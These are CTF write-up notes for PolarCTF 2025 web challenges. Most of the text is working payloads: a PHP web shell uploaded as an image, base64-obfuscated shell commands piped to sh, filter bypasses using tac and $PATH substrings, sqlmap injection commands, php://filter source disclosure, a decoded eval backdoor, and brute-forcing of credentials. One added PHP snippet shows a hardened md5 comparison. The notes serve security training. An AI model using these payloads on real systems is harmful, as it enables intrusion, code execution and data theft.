/password downloads an encrypted zip containing password.txt
Zip password cracking tool ARCHPR; brute-forced to 0606
Got the password; brute-force the login page
Account zhsh, password zhsh920
Got the page: ?page=givemeaimage
Content-Disposition: form-data; name="file"; filename="md1.php"
Content-Type: image/png
File uploaded successfully: uploads/md1.php
pass=system("ls /");
Repeater RCE (复读机RCE)
300 points, 3 Polar coins
[2025 Spring Individual Challenge]
echo "ls /"|base64
bHMgLwo=
cmd=echo bHMgLwo=|base64 -d |sh
echo "cat /flag.txt"|base64
Y2F0IC9mbGFnLnR4dAo=
cmd=echo Y2F0IC9mbGFnLnR4dAo=|base64 -d |sh
xCsMsD
300 points, 3 Polar coins
[2025 Spring Individual Challenge]
xss:
alert(document.cookie)
URL-decode; substitutions: space -> -, / -> \
cmd:
ls-\
cat, less, more and so on are filtered; use tac to print /flag
tac-\flag
background
100 points, 1 Polar coin
[2025 Spring Individual Challenge]
/change_background.php
POST:
d=ls&p=/
d=cat&p=/flag
coke's Login (coke的登陆)
300 points, 3 Polar coins
[2025 Spring Individual Challenge]
cookie:
my_cookie=coke-lishuai
user: coke
pass: coke-lishuai
Give Me Another 30 Yuan (再给我30元)
500 points, 5 Polar coins
[2025 Spring Individual Challenge]
sqlmap -u "url?id=0" -p id --level=5 --risk=3 --random-agent
Found that UNION works with 2 columns
sqlmap -u "url?id=0" -p id --level=5 --risk=3 --random-agent --union-col=2
sqlmap -u "url?id=0" -p id --level=5 --risk=3 --random-agent --union-col=2 --technique=U --dbms=mysql --sql-query="UNION SELECT 1,group_concat(schema_name) FROM information_schema.schemata" --dump
Gouheizi's Road to CTF Strength (狗黑子CTF变强之路)
500 points, 5 Polar coins
[2025 Spring Individual Challenge]
dirsearch -u url
Found: admin.php
/index.php?page=php://filter/convert.base64-encode/resource=admin.php
// hard-coded username and password
$correctUsername = "ggouheizi";
$correctPassword = "zigouhei";
After logging in, go to gougougou.php
Look at the file source:
/index.php?page=php://filter/convert.base64-encode/resource=gougougou.php
<?php
// {n} string offsets work on PHP < 8 (use [n] on PHP 8).
// In a double-quoted string "\v" is a single vertical-tab character, so every offset after it shifts by one.
$gou1="8AZ1mha\vHTnv9k4yAcyPZj98gG47*yESyR3xswJcDD4J2DNar";
$gou2="bgW5SQW9iUFN2anJGeldaeWNIWGZkYXVrcUdnd05wdElCS2lEc3hNRXpxQlprT3V3VWFUS0ZYUmZMZ212Y2hiaXBZZE55QUdzSVdWRVFueGpEUG9IU3RDTUpyZWxtTTlqV0FmeHFuVDJVWWpMS2k5cXcxREZZTkloZ1lSc0RoVVZCd0VYR3ZFN0hNOCtPeD09";
$gou3="tVXTklXR1prWVhWcCmNVZG5kMDV3ZEVsQ1MybEVjM2hOUlhweFFscHJUM1YzVldGVVMwWllVbVpNWjIxMlkyaGlhWEJaWkU1NVFVZHpTVmRXUlZGdWVHcEVVRzlJVTNSRFRVcHlaV3h0VFRscVYwRm1lSEZ1VkRKVldXcE1TMms1Y1hjeFJFWlpUa2xvWjFsU2MwUm9WVlpDZDBWWVIzWkZOMGhOT0N0UGVEMDk=";
$gou4=$gou1{20}.$gou1{41}.$gou1{13}.$gou1{38}.$gou1{6}.$gou1{9}.$gou1{1}.$gou1{25}.$gou1{2};
$gou5=$gou2{30}.$gou2{27}.$gou2{51}.$gou2{0}.$gou2{44}.$gou2{1}.$gou2{28}.$gou2{30}.$gou2{79}.$gou2{87}.$gou2{61}.$gou2{61}.$gou2{79};
$gou6=$gou1{34}.$gou3{36}.$gou1{39}.$gou3{41}.$gou1{47}.$gou3{0}.$gou3{20}.$gou3{16}.$gou3{62}.$gou3{62}.$gou3{159}.$gou3{3}.$gou1{37}.$gou3{231};
#$gou7=Z291MnsxN30uZ291MXs4fS5nb3U0ezR9LmdvdTV7MTJ9KCRnb3U0LiRnb3U1LiRnb3U2KQ==;
# $gou2{17}.$gou1{8}.$gou4{4}.$gou5{12}($gou4.$gou5.$gou6)
echo $gou2{17}.$gou1{8}.$gou4{4}.$gou5{12}."\n";
// #$gou8=$gou2{17}.$gou1{8}.$gou4{4}.$gou5{12}($gou4.$gou5.$gou6);
//echo $gou8
echo $gou4.$gou5.$gou6."\n";
?>
output
eHa1
ZDkJaTAGZXZhbCgkX1BTT13bc2atZCddKTw=
eva1:
$gou1="8AZ1mha\vHTnv9k4yAcyPZj98gG47*yESyR3xswJcDD4J2DNar";
$gou1="8AZ1mha1vHTnv9k4yAcyPZj98gG47*yESyR3xswJcDD4J2DNar";
eva1
PD9waHAgZXZhbCgkX1BTT1RbJ2NtZCddKTs=
└─# echo PD9waHAgZXZhbCgkX1BTT1RbJ2NtZCddKTs=|base64 -d
<?php eval($_PSOT['cmd']);
/gougougou.php
http://27f3544b-7436-43cb-9b0e-e3e0a3ee99ae.www.polarctf.com:8090/index.php?page=gougougou.php
POST:
cmd=system("cat /flag");
bllbl_rce
300 points, 3 Polar coins
[2025 Spring Individual Challenge]
dirsearch -u url
Found: /admin/admin.php
Download the source file:
if (strpos($command, 'bllbl') === false) {
    die("no");
}
command=echo bllbl;ls /;
command=echo bllbl;cat /flag;
Xiaobai Says Recon Matters (小白说收集很重要)
500 points, 5 Polar coins
[2025 Spring Individual Challenge]
dirsearch -u url
/users.json
/flag.php
/login.php
/upload_file.php
Generate a password dictionary from xiaobai
For usernames use a common-username list: admin, sysadmin, ...
Brute-force the admin account's username and password
0e Incident (0e事件)
100 points, 1 Polar coin
md5('QNKCDZO') == md5(240610708)
a=QNKCDZO
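Both of the md5() checks in these notes (the array trick on the Simple Navigation Site and the 0e comparison here) fail for the same reason: loose `==` on the digest. The following is an added example, not code from either challenge, showing the weak check beside a hardened one; it assumes the server compares two user-supplied values the way the challenges do:

```php
<?php
// Added example (not challenge code): md5() under loose and strict comparison.

// Vulnerable pattern: "different inputs, equal md5()" decided with ==.
function weak_check($user1, $user2): bool {
    return $user1 != $user2 && md5($user1) == md5($user2);
}

// Hardened pattern: only strings reach md5(), and the digests are compared
// with hash_equals(), which is strict (no numeric coercion) and constant-time.
function strong_check($user1, $user2): bool {
    if (!is_string($user1) || !is_string($user2)) {
        return false;                                   // arrays are rejected outright
    }
    return $user1 !== $user2 && hash_equals(md5($user1), md5($user2));
}

// 0e case: both digests are "0e" followed only by digits, so == sees two
// numeric strings and compares them as floats: 0e830... == 0e462... is 0 == 0.
var_dump(md5('QNKCDZO'));                        // 0e830400451993494058024219903391
var_dump(md5('240610708'));                      // 0e462097431906509019562988736854
var_dump(weak_check('QNKCDZO', '240610708'));    // true
var_dump(strong_check('QNKCDZO', '240610708'));  // false

// Array case (user1[]=1&user2[]=2): on PHP 7, md5(array) raises a warning and
// returns NULL on both sides, so NULL == NULL; PHP 8 throws a TypeError instead.
if (PHP_MAJOR_VERSION < 8) {
    var_dump(@weak_check([1], [2]));             // true on PHP 7
}
var_dump(strong_check([1], [2]));                // false on every version
```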
ez_check
500 points, 5 Polar coins
2025 Summer Individual Challenge
Java; set aside for now.
Gouheizi's Variable (狗黑子的变量)
500 points, 5 Polar coins
2025 Summer Individual Challenge
The four characters of PATH are not filtered.
Scanning finds admin.php
echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
l -- ${PATH:5:1}
s -- ${PATH:2:1}
c -- ${PATH:7:1}
?gou=${PATH:5:1}${PATH:2:1} ../
?gou=${PATH:7:1}at ../*a*
Gouheizi's Hiding (狗黑子的隐藏)
300 points, 3 Polar coins
2025 Summer Individual Challenge